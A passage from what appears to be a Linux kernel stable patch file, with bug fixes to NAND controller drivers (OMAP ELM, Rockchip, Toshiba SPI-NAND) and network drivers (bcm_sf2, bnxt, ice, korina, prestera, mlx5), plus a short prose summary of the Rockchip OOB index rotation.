+ 					((ecc[2] & 0xf) << 28);
+ 				elm_write_reg(info, offset, val);
+ 
+ 				/* syndrome fragment 1 = ecc[0-20b] bits */
+ 				offset += 4;
+-				val = cpu_to_be32(*(u32 *) &ecc[0]) >> 12;
++				val = (__force u32)cpu_to_be32(*(u32 *)&ecc[0]) >> 12;
+ 				elm_write_reg(info, offset, val);
+ 				break;
+ 			case BCH16_ECC:
+-				val = cpu_to_be32(*(u32 *) &ecc[22]);
++				val = (__force u32)cpu_to_be32(*(u32 *)&ecc[22]);
+ 				elm_write_reg(info, offset, val);
+ 				offset += 4;
+-				val = cpu_to_be32(*(u32 *) &ecc[18]);
++				val = (__force u32)cpu_to_be32(*(u32 *)&ecc[18]);
+ 				elm_write_reg(info, offset, val);
+ 				offset += 4;
+-				val = cpu_to_be32(*(u32 *) &ecc[14]);
++				val = (__force u32)cpu_to_be32(*(u32 *)&ecc[14]);
+ 				elm_write_reg(info, offset, val);
+ 				offset += 4;
+-				val = cpu_to_be32(*(u32 *) &ecc[10]);
++				val = (__force u32)cpu_to_be32(*(u32 *)&ecc[10]);
+ 				elm_write_reg(info, offset, val);
+ 				offset += 4;
+-				val = cpu_to_be32(*(u32 *) &ecc[6]);
++				val = (__force u32)cpu_to_be32(*(u32 *)&ecc[6]);
+ 				elm_write_reg(info, offset, val);
+ 				offset += 4;
+-				val = cpu_to_be32(*(u32 *) &ecc[2]);
++				val = (__force u32)cpu_to_be32(*(u32 *)&ecc[2]);
+ 				elm_write_reg(info, offset, val);
+ 				offset += 4;
+-				val = cpu_to_be32(*(u32 *) &ecc[0]) >> 16;
++				val = (__force u32)cpu_to_be32(*(u32 *)&ecc[0]) >> 16;
+ 				elm_write_reg(info, offset, val);
+ 				break;
+ 			default:
+diff --git a/drivers/mtd/nand/raw/rockchip-nand-controller.c b/drivers/mtd/nand/raw/rockchip-nand-controller.c
+index f133985cc053a..c9c4e9ffcae18 100644
+--- a/drivers/mtd/nand/raw/rockchip-nand-controller.c
++++ b/drivers/mtd/nand/raw/rockchip-nand-controller.c
+@@ -562,9 +562,10 @@ static int rk_nfc_write_page_raw(struct nand_chip *chip, const u8 *buf,
+ 		 *    BBM  OOB1 OOB2 OOB3 |......|  PA0  PA1  PA2  PA3
+ 		 *
+ 		 * The rk_nfc_ooblayout_free() function already has reserved
+-		 * these 4 bytes with:
++		 * these 4 bytes together with 2 bytes for BBM
++		 * by reducing its length:
+ 		 *
+-		 * oob_region->offset = NFC_SYS_DATA_SIZE + 2;
++		 * oob_region->length = rknand->metadata_size - NFC_SYS_DATA_SIZE - 2;
+ 		 */
+ 		if (!i)
+ 			memcpy(rk_nfc_oob_ptr(chip, i),
+@@ -597,7 +598,7 @@ static int rk_nfc_write_page_hwecc(struct nand_chip *chip, const u8 *buf,
+ 	int pages_per_blk = mtd->erasesize / mtd->writesize;
+ 	int ret = 0, i, boot_rom_mode = 0;
+ 	dma_addr_t dma_data, dma_oob;
+-	u32 reg;
++	u32 tmp;
+ 	u8 *oob;
+ 
+ 	nand_prog_page_begin_op(chip, page, 0, NULL, 0);
+@@ -624,6 +625,13 @@ static int rk_nfc_write_page_hwecc(struct nand_chip *chip, const u8 *buf,
+ 	 *
+ 	 *   0xFF 0xFF 0xFF 0xFF | BBM OOB1 OOB2 OOB3 | ...
+ 	 *
++	 * The code here just swaps the first 4 bytes with the last
++	 * 4 bytes without losing any data.
++	 *
++	 * The chip->oob_poi data layout:
++	 *
++	 *    BBM  OOB1 OOB2 OOB3 |......|  PA0  PA1  PA2  PA3
++	 *
+ 	 * Configure the ECC algorithm supported by the boot ROM.
+ 	 */
+ 	if ((page < (pages_per_blk * rknand->boot_blks)) &&
+@@ -634,21 +642,17 @@ static int rk_nfc_write_page_hwecc(struct nand_chip *chip, const u8 *buf,
+ 	}
+ 
+ 	for (i = 0; i < ecc->steps; i++) {
+-		if (!i) {
+-			reg = 0xFFFFFFFF;
+-		} else {
++		if (!i)
++			oob = chip->oob_poi + (ecc->steps - 1) * NFC_SYS_DATA_SIZE;
++		else
+ 			oob = chip->oob_poi + (i - 1) * NFC_SYS_DATA_SIZE;
+-			reg = oob[0] | oob[1] << 8 | oob[2] << 16 |
+-			      oob[3] << 24;
+-		}
+ 
+-		if (!i && boot_rom_mode)
+-			reg = (page & (pages_per_blk - 1)) * 4;
++		tmp = oob[0] | oob[1] << 8 | oob[2] << 16 | oob[3] << 24;
+ 
+ 		if (nfc->cfg->type == NFC_V9)
+-			nfc->oob_buf[i] = reg;
++			nfc->oob_buf[i] = tmp;
+ 		else
+-			nfc->oob_buf[i * (oob_step / 4)] = reg;
++			nfc->oob_buf[i * (oob_step / 4)] = tmp;
+ 	}
+ 
+ 	dma_data = dma_map_single(nfc->dev, (void *)nfc->page_buf,
+@@ -811,12 +815,17 @@ static int rk_nfc_read_page_hwecc(struct nand_chip *chip, u8 *buf, int oob_on,
+ 		goto timeout_err;
+ 	}
+ 
+-	for (i = 1; i < ecc->steps; i++) {
+-		oob = chip->oob_poi + (i - 1) * NFC_SYS_DATA_SIZE;
++	for (i = 0; i < ecc->steps; i++) {
++		if (!i)
++			oob = chip->oob_poi + (ecc->steps - 1) * NFC_SYS_DATA_SIZE;
++		else
++			oob = chip->oob_poi + (i - 1) * NFC_SYS_DATA_SIZE;
++
+ 		if (nfc->cfg->type == NFC_V9)
+ 			tmp = nfc->oob_buf[i];
+ 		else
+ 			tmp = nfc->oob_buf[i * (oob_step / 4)];
++
+ 		*oob++ = (u8)tmp;
+ 		*oob++ = (u8)(tmp >> 8);
+ 		*oob++ = (u8)(tmp >> 16);
+@@ -933,12 +942,8 @@ static int rk_nfc_ooblayout_free(struct mtd_info *mtd, int section,
+ 	if (section)
+ 		return -ERANGE;
+ 
+-	/*
+-	 * The beginning of the OOB area stores the reserved data for the NFC,
+-	 * the size of the reserved data is NFC_SYS_DATA_SIZE bytes.
+-	 */
+ 	oob_region->length = rknand->metadata_size - NFC_SYS_DATA_SIZE - 2;
+-	oob_region->offset = NFC_SYS_DATA_SIZE + 2;
++	oob_region->offset = 2;
+ 
+ 	return 0;
+ }
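
Taken together, the hunks above keep the free OOB area contiguous right
after the 2-byte BBM, while the boot-ROM page-address bytes (PA0..PA3) are
taken from the last NFC_SYS_DATA_SIZE chunk of chip->oob_poi. The index
rotation that the read and write paths now share, condensed into one
expression (a sketch of the logic above, not new driver code):

	/* hw slot 0 carries the chunk at the end of oob_poi (the PA
	 * bytes); every later slot i carries chunk i - 1, so the BBM
	 * chunk follows immediately */
	oob = chip->oob_poi +
	      (i ? i - 1 : ecc->steps - 1) * NFC_SYS_DATA_SIZE;
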
+diff --git a/drivers/mtd/nand/spi/toshiba.c b/drivers/mtd/nand/spi/toshiba.c
+index 7380b1ebaccd5..a80427c131216 100644
+--- a/drivers/mtd/nand/spi/toshiba.c
++++ b/drivers/mtd/nand/spi/toshiba.c
+@@ -73,7 +73,7 @@ static int tx58cxgxsxraix_ecc_get_status(struct spinand_device *spinand,
+ {
+ 	struct nand_device *nand = spinand_to_nand(spinand);
+ 	u8 mbf = 0;
+-	struct spi_mem_op op = SPINAND_GET_FEATURE_OP(0x30, &mbf);
++	struct spi_mem_op op = SPINAND_GET_FEATURE_OP(0x30, spinand->scratchbuf);
+ 
+ 	switch (status & STATUS_ECC_MASK) {
+ 	case STATUS_ECC_NO_BITFLIPS:
+@@ -92,7 +92,7 @@ static int tx58cxgxsxraix_ecc_get_status(struct spinand_device *spinand,
+ 		if (spi_mem_exec_op(spinand->spimem, &op))
+ 			return nanddev_get_ecc_conf(nand)->strength;
+ 
+-		mbf >>= 4;
++		mbf = *(spinand->scratchbuf) >> 4;
+ 
+ 		if (WARN_ON(mbf > nanddev_get_ecc_conf(nand)->strength || !mbf))
+ 			return nanddev_get_ecc_conf(nand)->strength;
+diff --git a/drivers/net/dsa/bcm_sf2.c b/drivers/net/dsa/bcm_sf2.c
+index cde253d27bd08..72374b066f64a 100644
+--- a/drivers/net/dsa/bcm_sf2.c
++++ b/drivers/net/dsa/bcm_sf2.c
+@@ -1436,7 +1436,9 @@ static int bcm_sf2_sw_probe(struct platform_device *pdev)
+ 	if (IS_ERR(priv->clk))
+ 		return PTR_ERR(priv->clk);
+ 
+-	clk_prepare_enable(priv->clk);
++	ret = clk_prepare_enable(priv->clk);
++	if (ret)
++		return ret;
+ 
+ 	priv->clk_mdiv = devm_clk_get_optional(&pdev->dev, "sw_switch_mdiv");
+ 	if (IS_ERR(priv->clk_mdiv)) {
+@@ -1444,7 +1446,9 @@ static int bcm_sf2_sw_probe(struct platform_device *pdev)
+ 		goto out_clk;
+ 	}
+ 
+-	clk_prepare_enable(priv->clk_mdiv);
++	ret = clk_prepare_enable(priv->clk_mdiv);
++	if (ret)
++		goto out_clk;
+ 
+ 	ret = bcm_sf2_sw_rst(priv);
+ 	if (ret) {
+diff --git a/drivers/net/ethernet/broadcom/bnxt/bnxt.c b/drivers/net/ethernet/broadcom/bnxt/bnxt.c
+index 6469fb8a42a89..969db3c45d176 100644
+--- a/drivers/net/ethernet/broadcom/bnxt/bnxt.c
++++ b/drivers/net/ethernet/broadcom/bnxt/bnxt.c
+@@ -721,17 +721,24 @@ next_tx_int:
+ 
+ static struct page *__bnxt_alloc_rx_page(struct bnxt *bp, dma_addr_t *mapping,
+ 					 struct bnxt_rx_ring_info *rxr,
++					 unsigned int *offset,
+ 					 gfp_t gfp)
+ {
+ 	struct device *dev = &bp->pdev->dev;
+ 	struct page *page;
+ 
+-	page = page_pool_dev_alloc_pages(rxr->page_pool);
++	if (PAGE_SIZE > BNXT_RX_PAGE_SIZE) {
++		page = page_pool_dev_alloc_frag(rxr->page_pool, offset,
++						BNXT_RX_PAGE_SIZE);
++	} else {
++		page = page_pool_dev_alloc_pages(rxr->page_pool);
++		*offset = 0;
++	}
+ 	if (!page)
+ 		return NULL;
+ 
+-	*mapping = dma_map_page_attrs(dev, page, 0, PAGE_SIZE, bp->rx_dir,
+-				      DMA_ATTR_WEAK_ORDERING);
++	*mapping = dma_map_page_attrs(dev, page, *offset, BNXT_RX_PAGE_SIZE,
++				      bp->rx_dir, DMA_ATTR_WEAK_ORDERING);
+ 	if (dma_mapping_error(dev, *mapping)) {
+ 		page_pool_recycle_direct(rxr->page_pool, page);
+ 		return NULL;
+@@ -771,15 +778,16 @@ int bnxt_alloc_rx_data(struct bnxt *bp, struct bnxt_rx_ring_info *rxr,
+ 	dma_addr_t mapping;
+ 
+ 	if (BNXT_RX_PAGE_MODE(bp)) {
++		unsigned int offset;
+ 		struct page *page =
+-			__bnxt_alloc_rx_page(bp, &mapping, rxr, gfp);
++			__bnxt_alloc_rx_page(bp, &mapping, rxr, &offset, gfp);
+ 
+ 		if (!page)
+ 			return -ENOMEM;
+ 
+ 		mapping += bp->rx_dma_offset;
+ 		rx_buf->data = page;
+-		rx_buf->data_ptr = page_address(page) + bp->rx_offset;
++		rx_buf->data_ptr = page_address(page) + offset + bp->rx_offset;
+ 	} else {
+ 		u8 *data = __bnxt_alloc_rx_frag(bp, &mapping, gfp);
+ 
+@@ -839,7 +847,7 @@ static inline int bnxt_alloc_rx_page(struct bnxt *bp,
+ 	unsigned int offset = 0;
+ 
+ 	if (BNXT_RX_PAGE_MODE(bp)) {
+-		page = __bnxt_alloc_rx_page(bp, &mapping, rxr, gfp);
++		page = __bnxt_alloc_rx_page(bp, &mapping, rxr, &offset, gfp);
+ 
+ 		if (!page)
+ 			return -ENOMEM;
+@@ -986,15 +994,15 @@ static struct sk_buff *bnxt_rx_multi_page_skb(struct bnxt *bp,
+ 		return NULL;
+ 	}
+ 	dma_addr -= bp->rx_dma_offset;
+-	dma_unmap_page_attrs(&bp->pdev->dev, dma_addr, PAGE_SIZE, bp->rx_dir,
+-			     DMA_ATTR_WEAK_ORDERING);
+-	skb = build_skb(page_address(page), PAGE_SIZE);
++	dma_unmap_page_attrs(&bp->pdev->dev, dma_addr, BNXT_RX_PAGE_SIZE,
++			     bp->rx_dir, DMA_ATTR_WEAK_ORDERING);
++	skb = build_skb(data_ptr - bp->rx_offset, BNXT_RX_PAGE_SIZE);
+ 	if (!skb) {
+ 		page_pool_recycle_direct(rxr->page_pool, page);
+ 		return NULL;
+ 	}
+ 	skb_mark_for_recycle(skb);
+-	skb_reserve(skb, bp->rx_dma_offset);
++	skb_reserve(skb, bp->rx_offset);
+ 	__skb_put(skb, len);
+ 
+ 	return skb;
+@@ -1020,8 +1028,8 @@ static struct sk_buff *bnxt_rx_page_skb(struct bnxt *bp,
+ 		return NULL;
+ 	}
+ 	dma_addr -= bp->rx_dma_offset;
+-	dma_unmap_page_attrs(&bp->pdev->dev, dma_addr, PAGE_SIZE, bp->rx_dir,
+-			     DMA_ATTR_WEAK_ORDERING);
++	dma_unmap_page_attrs(&bp->pdev->dev, dma_addr, BNXT_RX_PAGE_SIZE,
++			     bp->rx_dir, DMA_ATTR_WEAK_ORDERING);
+ 
+ 	if (unlikely(!payload))
+ 		payload = eth_get_headlen(bp->dev, data_ptr, len);
+@@ -1034,7 +1042,7 @@ static struct sk_buff *bnxt_rx_page_skb(struct bnxt *bp,
+ 
+ 	skb_mark_for_recycle(skb);
+ 	off = (void *)data_ptr - page_address(page);
+-	skb_add_rx_frag(skb, 0, page, off, len, PAGE_SIZE);
++	skb_add_rx_frag(skb, 0, page, off, len, BNXT_RX_PAGE_SIZE);
+ 	memcpy(skb->data - NET_IP_ALIGN, data_ptr - NET_IP_ALIGN,
+ 	       payload + NET_IP_ALIGN);
+ 
+@@ -1169,7 +1177,7 @@ static struct sk_buff *bnxt_rx_agg_pages_skb(struct bnxt *bp,
+ 
+ 	skb->data_len += total_frag_len;
+ 	skb->len += total_frag_len;
+-	skb->truesize += PAGE_SIZE * agg_bufs;
++	skb->truesize += BNXT_RX_PAGE_SIZE * agg_bufs;
+ 	return skb;
+ }
+ 
+@@ -2972,8 +2980,8 @@ skip_rx_tpa_free:
+ 		rx_buf->data = NULL;
+ 		if (BNXT_RX_PAGE_MODE(bp)) {
+ 			mapping -= bp->rx_dma_offset;
+-			dma_unmap_page_attrs(&pdev->dev, mapping, PAGE_SIZE,
+-					     bp->rx_dir,
++			dma_unmap_page_attrs(&pdev->dev, mapping,
++					     BNXT_RX_PAGE_SIZE, bp->rx_dir,
+ 					     DMA_ATTR_WEAK_ORDERING);
+ 			page_pool_recycle_direct(rxr->page_pool, data);
+ 		} else {
+@@ -3241,6 +3249,8 @@ static int bnxt_alloc_rx_page_pool(struct bnxt *bp,
+ 	pp.nid = dev_to_node(&bp->pdev->dev);
+ 	pp.dev = &bp->pdev->dev;
+ 	pp.dma_dir = DMA_BIDIRECTIONAL;
++	if (PAGE_SIZE > BNXT_RX_PAGE_SIZE)
++		pp.flags |= PP_FLAG_PAGE_FRAG;
+ 
+ 	rxr->page_pool = page_pool_create(&pp);
+ 	if (IS_ERR(rxr->page_pool)) {
+@@ -4017,26 +4027,29 @@ void bnxt_set_ring_params(struct bnxt *bp)
+  */
+ int bnxt_set_rx_skb_mode(struct bnxt *bp, bool page_mode)
+ {
++	struct net_device *dev = bp->dev;
++
+ 	if (page_mode) {
+ 		bp->flags &= ~BNXT_FLAG_AGG_RINGS;
+ 		bp->flags |= BNXT_FLAG_RX_PAGE_MODE;
+ 
+-		if (bp->dev->mtu > BNXT_MAX_PAGE_MODE_MTU) {
++		if (bp->xdp_prog->aux->xdp_has_frags)
++			dev->max_mtu = min_t(u16, bp->max_mtu, BNXT_MAX_MTU);
++		else
++			dev->max_mtu =
++				min_t(u16, bp->max_mtu, BNXT_MAX_PAGE_MODE_MTU);
++		if (dev->mtu > BNXT_MAX_PAGE_MODE_MTU) {
+ 			bp->flags |= BNXT_FLAG_JUMBO;
+ 			bp->rx_skb_func = bnxt_rx_multi_page_skb;
+-			bp->dev->max_mtu =
+-				min_t(u16, bp->max_mtu, BNXT_MAX_MTU);
+ 		} else {
+ 			bp->flags |= BNXT_FLAG_NO_AGG_RINGS;
+ 			bp->rx_skb_func = bnxt_rx_page_skb;
+-			bp->dev->max_mtu =
+-				min_t(u16, bp->max_mtu, BNXT_MAX_PAGE_MODE_MTU);
+ 		}
+ 		bp->rx_dir = DMA_BIDIRECTIONAL;
+ 		/* Disable LRO or GRO_HW */
+-		netdev_update_features(bp->dev);
++		netdev_update_features(dev);
+ 	} else {
+-		bp->dev->max_mtu = bp->max_mtu;
++		dev->max_mtu = bp->max_mtu;
+ 		bp->flags &= ~BNXT_FLAG_RX_PAGE_MODE;
+ 		bp->rx_dir = DMA_FROM_DEVICE;
+ 		bp->rx_skb_func = bnxt_rx_skb;
+diff --git a/drivers/net/ethernet/broadcom/bnxt/bnxt_xdp.c b/drivers/net/ethernet/broadcom/bnxt/bnxt_xdp.c
+index 36d5202c0aeec..aa56db138d6b5 100644
+--- a/drivers/net/ethernet/broadcom/bnxt/bnxt_xdp.c
++++ b/drivers/net/ethernet/broadcom/bnxt/bnxt_xdp.c
+@@ -180,8 +180,8 @@ void bnxt_xdp_buff_init(struct bnxt *bp, struct bnxt_rx_ring_info *rxr,
+ 			u16 cons, u8 *data_ptr, unsigned int len,
+ 			struct xdp_buff *xdp)
+ {
++	u32 buflen = BNXT_RX_PAGE_SIZE;
+ 	struct bnxt_sw_rx_bd *rx_buf;
+-	u32 buflen = PAGE_SIZE;
+ 	struct pci_dev *pdev;
+ 	dma_addr_t mapping;
+ 	u32 offset;
+@@ -297,7 +297,7 @@ bool bnxt_rx_xdp(struct bnxt *bp, struct bnxt_rx_ring_info *rxr, u16 cons,
+ 		rx_buf = &rxr->rx_buf_ring[cons];
+ 		mapping = rx_buf->mapping - bp->rx_dma_offset;
+ 		dma_unmap_page_attrs(&pdev->dev, mapping,
+-				     PAGE_SIZE, bp->rx_dir,
++				     BNXT_RX_PAGE_SIZE, bp->rx_dir,
+ 				     DMA_ATTR_WEAK_ORDERING);
+ 
+ 		/* if we are unable to allocate a new buffer, abort and reuse */
+@@ -478,7 +478,7 @@ bnxt_xdp_build_skb(struct bnxt *bp, struct sk_buff *skb, u8 num_frags,
+ 	}
+ 	xdp_update_skb_shared_info(skb, num_frags,
+ 				   sinfo->xdp_frags_size,
+-				   PAGE_SIZE * sinfo->nr_frags,
++				   BNXT_RX_PAGE_SIZE * sinfo->nr_frags,
+ 				   xdp_buff_is_frag_pfmemalloc(xdp));
+ 	return skb;
+ }
+diff --git a/drivers/net/ethernet/intel/ice/ice_main.c b/drivers/net/ethernet/intel/ice/ice_main.c
+index 8f77088900e94..a771e597795d3 100644
+--- a/drivers/net/ethernet/intel/ice/ice_main.c
++++ b/drivers/net/ethernet/intel/ice/ice_main.c
+@@ -8777,6 +8777,7 @@ ice_setup_tc(struct net_device *netdev, enum tc_setup_type type,
+ {
+ 	struct ice_netdev_priv *np = netdev_priv(netdev);
+ 	struct ice_pf *pf = np->vsi->back;
++	bool locked = false;
+ 	int err;
+ 
+ 	switch (type) {
+@@ -8786,10 +8787,27 @@ ice_setup_tc(struct net_device *netdev, enum tc_setup_type type,
+ 						  ice_setup_tc_block_cb,
+ 						  np, np, true);
+ 	case TC_SETUP_QDISC_MQPRIO:
++		if (pf->adev) {
++			mutex_lock(&pf->adev_mutex);
++			device_lock(&pf->adev->dev);
++			locked = true;
++			if (pf->adev->dev.driver) {
++				netdev_err(netdev, "Cannot change qdisc when RDMA is active\n");
++				err = -EBUSY;
++				goto adev_unlock;
++			}
++		}
++
+ 		/* setup traffic classifier for receive side */
+ 		mutex_lock(&pf->tc_mutex);
+ 		err = ice_setup_tc_mqprio_qdisc(netdev, type_data);
+ 		mutex_unlock(&pf->tc_mutex);
++
++adev_unlock:
++		if (locked) {
++			device_unlock(&pf->adev->dev);
++			mutex_unlock(&pf->adev_mutex);
++		}
+ 		return err;
+ 	default:
+ 		return -EOPNOTSUPP;
+diff --git a/drivers/net/ethernet/korina.c b/drivers/net/ethernet/korina.c
+index 2b9335cb4bb3a..8537578e1cf1d 100644
+--- a/drivers/net/ethernet/korina.c
++++ b/drivers/net/ethernet/korina.c
+@@ -1302,11 +1302,10 @@ static int korina_probe(struct platform_device *pdev)
+ 	else if (of_get_ethdev_address(pdev->dev.of_node, dev) < 0)
+ 		eth_hw_addr_random(dev);
+ 
+-	clk = devm_clk_get_optional(&pdev->dev, "mdioclk");
++	clk = devm_clk_get_optional_enabled(&pdev->dev, "mdioclk");
+ 	if (IS_ERR(clk))
+ 		return PTR_ERR(clk);
+ 	if (clk) {
+-		clk_prepare_enable(clk);
+ 		lp->mii_clock_freq = clk_get_rate(clk);
+ 	} else {
+ 		lp->mii_clock_freq = 200000000; /* max possible input clk */
+diff --git a/drivers/net/ethernet/marvell/prestera/prestera_pci.c b/drivers/net/ethernet/marvell/prestera/prestera_pci.c
+index 59470d99f5228..a37dbbda8de39 100644
+--- a/drivers/net/ethernet/marvell/prestera/prestera_pci.c
++++ b/drivers/net/ethernet/marvell/prestera/prestera_pci.c
+@@ -702,7 +702,8 @@ pick_fw_ver:
+ 
+ 	err = request_firmware_direct(&fw->bin, fw_path, fw->dev.dev);
+ 	if (err) {
+-		if (ver_maj == PRESTERA_SUPP_FW_MAJ_VER) {
++		if (ver_maj != PRESTERA_PREV_FW_MAJ_VER ||
++		    ver_min != PRESTERA_PREV_FW_MIN_VER) {
+ 			ver_maj = PRESTERA_PREV_FW_MAJ_VER;
+ 			ver_min = PRESTERA_PREV_FW_MIN_VER;
+ 
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/en_accel/ipsec_rxtx.c b/drivers/net/ethernet/mellanox/mlx5/core/en_accel/ipsec_rxtx.c
+index 6859f1c1a8319..c4a84f0a3b733 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/en_accel/ipsec_rxtx.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/en_accel/ipsec_rxtx.c
+@@ -58,7 +58,9 @@ static int mlx5e_ipsec_remove_trailer(struct sk_buff *skb, struct xfrm_state *x)
+ 
+ 	trailer_len = alen + plen + 2;
+ 
+-	pskb_trim(skb, skb->len - trailer_len);
++	ret = pskb_trim(skb, skb->len - trailer_len);
++	if (unlikely(ret))
++		return ret;
+ 	if (skb->protocol == htons(ETH_P_IP)) {
+ 		ipv4hdr->tot_len = htons(ntohs(ipv4hdr->tot_len) - trailer_len);
+ 		ip_send_check(ipv4hdr);
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/en_accel/macsec_fs.c b/drivers/net/ethernet/mellanox/mlx5/core/en_accel/macsec_fs.c
+index 5b658a5588c64..6ecf0bf2366ad 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/en_accel/macsec_fs.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/en_accel/macsec_fs.c
+@@ -160,6 +160,7 @@ static int macsec_fs_tx_create_crypto_table_groups(struct mlx5e_flow_table *ft)
+ 
+ 	if (!in) {
+ 		kfree(ft->g);
++		ft->g = NULL;
+ 		return -ENOMEM;
+ 	}
+ 
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/en_arfs.c b/drivers/net/ethernet/mellanox/mlx5/core/en_arfs.c
+index 0ae1865086ff1..dc0a0a27ac84a 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/en_arfs.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/en_arfs.c
+@@ -136,6 +136,16 @@ static void arfs_del_rules(struct mlx5e_flow_steering *fs);
+ 
+ int mlx5e_arfs_disable(struct mlx5e_flow_steering *fs)
+ {
++	/* When moving to switchdev mode, fs->arfs is freed by the
++	 * mlx5e_nic_profile cleanup_rx callback and is not recreated when
++	 * mlx5e_uplink_rep_profile is loaded, since mlx5e_create_flow_steering()
++	 * is not called by the uplink_rep profile init_rx callback. Thus, if
++	 * ntuple is set, the switchdev transition enters this function
++	 * with fs->arfs nullified.
++	 */
++	if (!mlx5e_fs_get_arfs(fs))
++		return 0;
++
+ 	arfs_del_rules(fs);
+ 
+ 	return arfs_disable(fs);
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/en_rep.c b/drivers/net/ethernet/mellanox/mlx5/core/en_rep.c
+index 9bd1a93a512d4..bd895ef341a0b 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/en_rep.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/en_rep.c
+@@ -912,7 +912,7 @@ static int mlx5e_init_rep_rx(struct mlx5e_priv *priv)
+ 	err = mlx5e_open_drop_rq(priv, &priv->drop_rq);
+ 	if (err) {
+ 		mlx5_core_err(mdev, "open drop rq failed, %d\n", err);
+-		return err;
++		goto err_rx_res_free;
+ 	}
+ 
+ 	err = mlx5e_rx_res_init(priv->rx_res, priv->mdev, 0,
+@@ -946,6 +946,7 @@ err_destroy_rx_res:
+ 	mlx5e_rx_res_destroy(priv->rx_res);
+ err_close_drop_rq:
+ 	mlx5e_close_drop_rq(&priv->drop_rq);
++err_rx_res_free:
+ 	mlx5e_rx_res_free(priv->rx_res);
+ 	priv->rx_res = NULL;
+ err_free_fs:
+@@ -1039,6 +1040,10 @@ static int mlx5e_init_rep_tx(struct mlx5e_priv *priv)
+ 		return err;
+ 	}
+ 
++	err = mlx5e_rep_neigh_init(rpriv);
++	if (err)
++		goto err_neigh_init;
++
+ 	if (rpriv->rep->vport == MLX5_VPORT_UPLINK) {
+ 		err = mlx5e_init_uplink_rep_tx(rpriv);
+ 		if (err)
+@@ -1055,6 +1060,8 @@ err_ht_init:
+ 	if (rpriv->rep->vport == MLX5_VPORT_UPLINK)
+ 		mlx5e_cleanup_uplink_rep_tx(rpriv);
+ err_init_tx:
++	mlx5e_rep_neigh_cleanup(rpriv);
++err_neigh_init:
+ 	mlx5e_destroy_tises(priv);
+ 	return err;
+ }
+@@ -1068,22 +1075,17 @@ static void mlx5e_cleanup_rep_tx(struct mlx5e_priv *priv)
+ 	if (rpriv->rep->vport == MLX5_VPORT_UPLINK)
+ 		mlx5e_cleanup_uplink_rep_tx(rpriv);
+ 
++	mlx5e_rep_neigh_cleanup(rpriv);
+ 	mlx5e_destroy_tises(priv);
+ }
+ 
+ static void mlx5e_rep_enable(struct mlx5e_priv *priv)
+ {
+-	struct mlx5e_rep_priv *rpriv = priv->ppriv;
+-
+ 	mlx5e_set_netdev_mtu_boundaries(priv);
+-	mlx5e_rep_neigh_init(rpriv);
+ }
+ 
+ static void mlx5e_rep_disable(struct mlx5e_priv *priv)
+ {
+-	struct mlx5e_rep_priv *rpriv = priv->ppriv;
+-
+-	mlx5e_rep_neigh_cleanup(rpriv);
+ }
+ 
+ static int mlx5e_update_rep_rx(struct mlx5e_priv *priv)
+@@ -1118,7 +1120,6 @@ static int uplink_rep_async_event(struct notifier_block *nb, unsigned long event
+ 
+ static void mlx5e_uplink_rep_enable(struct mlx5e_priv *priv)
+ {
+-	struct mlx5e_rep_priv *rpriv = priv->ppriv;
+ 	struct net_device *netdev = priv->netdev;
+ 	struct mlx5_core_dev *mdev = priv->mdev;
+ 	u16 max_mtu;
+@@ -1138,7 +1139,6 @@ static void mlx5e_uplink_rep_enable(struct mlx5e_priv *priv)
+ 	mlx5_notifier_register(mdev, &priv->events_nb);
+ 	mlx5e_dcbnl_initialize(priv);
+ 	mlx5e_dcbnl_init_app(priv);
+-	mlx5e_rep_neigh_init(rpriv);
+ 	mlx5e_rep_bridge_init(priv);
+ 
+ 	netdev->wanted_features |= NETIF_F_HW_TC;
+@@ -1153,7 +1153,6 @@ static void mlx5e_uplink_rep_enable(struct mlx5e_priv *priv)
+ 
+ static void mlx5e_uplink_rep_disable(struct mlx5e_priv *priv)
+ {
+-	struct mlx5e_rep_priv *rpriv = priv->ppriv;
+ 	struct mlx5_core_dev *mdev = priv->mdev;
+ 
+ 	rtnl_lock();
+@@ -1163,7 +1162,6 @@ static void mlx5e_uplink_rep_disable(struct mlx5e_priv *priv)
+ 	rtnl_unlock();
+ 
+ 	mlx5e_rep_bridge_cleanup(priv);
+-	mlx5e_rep_neigh_cleanup(rpriv);
+ 	mlx5e_dcbnl_delete_app(priv);
+ 	mlx5_notifier_unregister(mdev, &priv->events_nb);
+ 	mlx5e_rep_tc_disable(priv);
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/eq.c b/drivers/net/ethernet/mellanox/mlx5/core/eq.c
+index a0242dc15741c..e112b5685b02b 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/eq.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/eq.c
+@@ -1061,7 +1061,7 @@ void mlx5_core_eq_free_irqs(struct mlx5_core_dev *dev)
+ 	mutex_lock(&table->lock); /* sync with create/destroy_async_eq */
+ 	if (!mlx5_core_is_sf(dev))
+ 		clear_rmap(dev);
+-	mlx5_irq_table_destroy(dev);
++	mlx5_irq_table_free_irqs(dev);
+ 	mutex_unlock(&table->lock);
+ }
+ 
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/fs_core.c b/drivers/net/ethernet/mellanox/mlx5/core/fs_core.c
+index d53749248fa09..e6674118bc428 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/fs_core.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/fs_core.c
+@@ -860,7 +860,7 @@ static struct mlx5_flow_table *find_closest_ft_recursive(struct fs_node  *root,
+ 	struct fs_node *iter = list_entry(start, struct fs_node, list);
+ 	struct mlx5_flow_table *ft = NULL;
+ 
+-	if (!root || root->type == FS_TYPE_PRIO_CHAINS)
++	if (!root)
+ 		return NULL;
+ 
+ 	list_for_each_advance_continue(iter, &root->children, reverse) {
+@@ -876,20 +876,42 @@ static struct mlx5_flow_table *find_closest_ft_recursive(struct fs_node  *root,
+ 	return ft;
+ }
+ 
+-/* If reverse is false then return the first flow table in next priority of
+- * prio in the tree, else return the last flow table in the previous priority
